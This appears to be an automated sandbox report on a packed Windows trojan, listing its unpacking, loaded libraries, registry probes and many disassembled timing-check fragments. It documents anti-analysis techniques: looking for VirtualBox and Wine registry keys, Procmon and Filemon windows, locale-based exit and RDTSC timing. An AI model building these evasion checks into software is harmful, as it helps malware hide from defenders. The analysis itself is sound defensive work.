              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ECE1B0_2_006ECE1B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032B71E0_2_0032B71E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C27350_2_006C2735
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B9FC60_2_006B9FC6
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00304A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: jerbjqqv ZLIB complexity 0.9945139124773551
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00323A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00323A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0031CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\29SY8Y70.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1801728 > 1048576
              Source: file.exeStatic PE information: Raw size of jerbjqqv is bigger than: 0x100000 < 0x19e000

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00326390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00326390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c2726 should be: 0x1c5cce
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: jerbjqqv
              Source: file.exeStatic PE information: section name: nuqdewfy
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A0069 push esi; mov dword ptr [esp], ecx0_2_0079FFFF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EF077 push 11A124A4h; mov dword ptr [esp], edx0_2_006EF09F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076D057 push 18E78272h; mov dword ptr [esp], ebp0_2_0076D07B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076D057 push eax; mov dword ptr [esp], edx0_2_0076D084
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CC05B push ebp; mov dword ptr [esp], 66F5E965h0_2_006CC083
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CC05B push esi; mov dword ptr [esp], ecx0_2_006CC08C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F6823 push ecx; mov dword ptr [esp], ebp0_2_006F6828
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F6823 push 0A201E51h; mov dword ptr [esp], esi0_2_006F6832
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00654835 push 083E30B3h; mov dword ptr [esp], ecx0_2_006548CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077702E push 197425E1h; mov dword ptr [esp], ecx0_2_00777050
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3007 push 654CE016h; mov dword ptr [esp], eax0_2_006E302A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072F019 push edi; mov dword ptr [esp], 7D5E4891h0_2_0072F04E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072F019 push eax; mov dword ptr [esp], edx0_2_0072F07F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D0800 push ebp; mov dword ptr [esp], ebx0_2_006D0888
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00992000 push edi; mov dword ptr [esp], 3A491801h0_2_0099201A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00992000 push edi; mov dword ptr [esp], ebx0_2_00992028
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00992000 push ecx; mov dword ptr [esp], edi0_2_00992109
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00992000 push eax; mov dword ptr [esp], 6B3F5BB1h0_2_00992137
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push ebp; mov dword ptr [esp], esi0_2_006B196A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 4E910A0Dh; mov dword ptr [esp], esi0_2_006B19F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 2963E3E6h; mov dword ptr [esp], ebx0_2_006B1A03
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push ecx; mov dword ptr [esp], 7AEE06C2h0_2_006B1AC2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push ecx; mov dword ptr [esp], 18C6C348h0_2_006B1B17
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 13211ECCh; mov dword ptr [esp], eax0_2_006B1B84
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push edx; mov dword ptr [esp], 7BFEC021h0_2_006B1B89
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 2AEB256Dh; mov dword ptr [esp], eax0_2_006B1C1B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 245D70B8h; mov dword ptr [esp], eax0_2_006B1CDE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 197A9013h; mov dword ptr [esp], eax0_2_006B1CF6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 5D1E8AF1h; mov dword ptr [esp], edx0_2_006B1D74
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push ebp; mov dword ptr [esp], edx0_2_006B1DE4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push edi; mov dword ptr [esp], edx0_2_006B1E57
              Source: file.exeStatic PE information: section name: jerbjqqv entropy: 7.954382672261457

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00326390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00326390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26053
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F959 second address: 54F95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C06E3 second address: 6C06FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8904C1C3h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C06FE second address: 6C0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jnl 00007FCE88B69066h 0x0000000f jmp 00007FCE88B69074h 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 jmp 00007FCE88B6906Fh 0x0000001b pop ecx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0733 second address: 6C0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0739 second address: 6C073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C073F second address: 6C0743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB987 second address: 6CB98D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE3F9 second address: 54F959 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCE88C945DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 1E398C69h 0x00000011 and esi, dword ptr [ebp+122D36FAh] 0x00000017 push dword ptr [ebp+122D1345h] 0x0000001d call dword ptr [ebp+122D192Dh] 0x00000023 pushad 0x00000024 js 00007FCE88C945DCh 0x0000002a sub dword ptr [ebp+122D184Dh], ebx 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D19CBh], eax 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a jbe 00007FCE88C945E5h 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 pushad 0x00000045 mov dword ptr [ebp+122D19CBh], edi 0x0000004b or ecx, dword ptr [ebp+122D35A6h] 0x00000051 popad 0x00000052 mov dword ptr [ebp+122D36B6h], eax 0x00000058 jmp 00007FCE88C945E1h 0x0000005d mov esi, 0000003Ch 0x00000062 jp 00007FCE88C945DCh 0x00000068 mov dword ptr [ebp+122D184Dh], edi 0x0000006e add esi, dword ptr [esp+24h] 0x00000072 jnp 00007FCE88C945E2h 0x00000078 jmp 00007FCE88C945DCh 0x0000007d lodsw 0x0000007f sub dword ptr [ebp+122D19CBh], esi 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 sub dword ptr [ebp+122D196Eh], eax 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 stc 0x00000094 push eax 0x00000095 push edx 0x00000096 push eax 0x00000097 push edx 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE503 second address: 6CE509 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE5B5 second address: 6CE646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, 711092C5h 0x00000010 mov dword ptr [ebp+122D1966h], edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1D01h], esi 0x0000001e push A4FB9B6Dh 0x00000023 jmp 00007FCE88C945E2h 0x00000028 add dword ptr [esp], 5B046513h 0x0000002f jne 00007FCE88C945DCh 0x00000035 push 00000003h 0x00000037 mov si, DBB1h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FCE88C945D8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 jmp 00007FCE88C945E0h 0x0000005c push 00000003h 0x0000005e mov edi, dword ptr [ebp+122D37EAh] 0x00000064 push 9DEB2935h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE70D second address: 6CE757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1E226FBAh 0x00000010 mov dword ptr [ebp+122D196Eh], edi 0x00000016 push 00000003h 0x00000018 xor dh, FFFFFFA5h 0x0000001b push 00000000h 0x0000001d mov cl, 80h 0x0000001f push 00000003h 0x00000021 mov dl, 83h 0x00000023 call 00007FCE8882CE19h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jg 00007FCE8882CE16h 0x00000031 pop edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE757 second address: 6CE776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88C945E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE776 second address: 6CE77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE77B second address: 6CE785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCE88C945D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE785 second address: 6CE7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jne 00007FCE8882CE18h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jp 00007FCE8882CE16h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007FCE8882CE1Ah 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jbe 00007FCE8882CE1Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE7BF second address: 6CE7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE7C3 second address: 6CE813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+122D35C6h] 0x00000010 lea ebx, dword ptr [ebp+12452358h] 0x00000016 mov esi, dword ptr [ebp+122D3802h] 0x0000001c xchg eax, ebx 0x0000001d jp 00007FCE8882CE24h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007FCE8882CE1Bh 0x0000002c push edx 0x0000002d pop edx 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE813 second address: 6CE818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EF127 second address: 6EF173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCE8882CE16h 0x0000000a popad 0x0000000b jmp 00007FCE8882CE26h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 jmp 00007FCE8882CE1Eh 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007FCE8882CE24h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECF69 second address: 6ECF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECF6F second address: 6ECF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8882CE28h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED2CE second address: 6ED2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED2D2 second address: 6ED2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED2DA second address: 6ED30E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88C945E7h 0x00000007 jmp 00007FCE88C945E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED30E second address: 6ED312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED312 second address: 6ED31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED31E second address: 6ED34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FCE8882CE16h 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007FCE8882CE16h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FCE8882CE20h 0x0000001d popad 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop edx 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED873 second address: 6ED8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88C945E5h 0x00000009 pop esi 0x0000000a jmp 00007FCE88C945DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCE88C945DDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED8AC second address: 6ED8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED8B0 second address: 6ED8EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FCE88C945E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FCE88C945DCh 0x00000014 jnp 00007FCE88C945D6h 0x0000001a jmp 00007FCE88C945DFh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED8EB second address: 6ED8F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jno 00007FCE8882CE16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDA7B second address: 6EDA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCE88C945DBh 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE084 second address: 6EE098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE8882CE1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE098 second address: 6EE09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE34D second address: 6EE351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE8FE second address: 6EE909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EED13 second address: 6EED1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2454 second address: 6F245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1486 second address: 6B148B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA63C second address: 6FA643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA643 second address: 6FA649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBF06 second address: 6FBF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBF14 second address: 6FBF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBFAB second address: 6FC026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FCE88C945E9h 0x0000000e mov eax, dword ptr [eax] 0x00000010 jng 00007FCE88C945F1h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FCE88C945E7h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007FCE88C945DDh 0x00000028 pop eax 0x00000029 call 00007FCE88C945DAh 0x0000002e mov si, 9B63h 0x00000032 pop esi 0x00000033 and edi, dword ptr [ebp+122D3746h] 0x00000039 push 92FB8150h 0x0000003e push eax 0x0000003f push edx 0x00000040 je 00007FCE88C945D8h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC511 second address: 6FC517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC517 second address: 6FC51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC7A5 second address: 6FC7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC7AB second address: 6FC7CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FCE88C945F0h 0x0000000f pushad 0x00000010 jmp 00007FCE88C945E2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCFE0 second address: 6FCFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCE8882CE16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD23E second address: 6FD242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
